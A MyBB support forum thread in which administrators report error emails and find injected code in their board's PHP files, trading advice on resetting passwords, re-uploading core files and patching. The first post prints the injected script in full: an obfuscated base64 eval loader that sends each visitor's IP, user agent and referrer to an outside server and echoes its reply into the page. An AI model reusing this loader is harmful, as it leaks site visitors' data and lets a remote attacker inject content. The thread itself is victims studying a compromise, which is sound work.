MyBB Community Forums

today i got bulk error email from my board

saying Your copy of ******  (http://www.*****.com) has experienced an error. Details of the error include:
---
Type: 2
File: archive/index.php (Line no. 506)
Message
file_get_contents(http://91.196.216.30/bt.php?ip=173.245.49.72&amp;host=www.seminarprojects.com&amp;uri=%2Farchive%2Findex.php%2Fforum-22.html&amp;ua=mozilla%2F5.0+%28windows%3B+u%3B+windows+nt+6.1%3B+en-us%3B+rv%3A1.9.1.5%29+gecko%2F20091102+firefox%2F3.5.5&amp;ref=http%3A%2F%2Fwww.seminarprojects.com%2Farchive%2Findex.php) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: HTTP request failed! HTTP/1.1 502 Bad Gateway

and in the same file i found a suspicious script

<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>

i found there is lot of error like in google
http://www.google.co.in/search?gcx=c&sou...196.216.30



i reset cpanel,mysql password since i feel its like script injection ?



can any one more about this ?

---

i think someone has injected malicious script in php file
and there is similar page in http://community.mybb.com/thread-105586.html

Got the same error mails - i also found modified files (all index.php, config.php, etc.) with injected code :-(

Re-upload a fresh mybb core files.

I have had this same problem today with error messages being mailed to me everytime the front page (index.php) is accessed. Looking at this file, I see that it was modified at 0751 this morning and I know I didn't do it. So looking at the file "index.php" using a text editor, I see that a line of code has been added at the very end of the file. I've commented it out, resaved it and, hopefully, the problem is solved. The question remains, how can anybody get to this file and add to it the way that they have. Is it easy to find because my folder name that the site is run on is in the folder /myBB/ ? Even so, how do they edit it? I run the web server myself on my own network and it's also behind a port...............

Also just seen this related post which patches the file index.php - I followed the manual instructions, so hopefully, this problem will not reappear.......

http://blog.mybb.com/wp-content/uploads/...atches.txt

(2011-10-12, 05:15 PM)RogerD Wrote: [ -> ]I have had this same problem today with error messages being mailed to me everytime the front page (index.php) is accessed. Looking at this file, I see that it was modified at 0751 this morning and I know I didn't do it. So looking at the file "index.php" using a text editor, I see that a line of code has been added at the very end of the file. I've commented it out, resaved it and, hopefully, the problem is solved. The question remains, how can anybody get to this file and add to it the way that they have. Is it easy to find because my folder name that the site is run on is in the folder /myBB/ ? Even so, how do they edit it? I run the web server myself on my own network and it's also behind a port...............

Also just seen this related post which patches the file index.php - I followed the manual instructions, so hopefully, this problem will not reappear.......

http://blog.mybb.com/wp-content/uploads/...atches.txt

Broke link ?

Something similar happened to me yesterday.

i re uploaded fresh mybb already ..

can any one say how does they inject script on php file?

can i possible to block this breach at all?

---

what would if i change file permission to 444 ?

mean file writing permission denied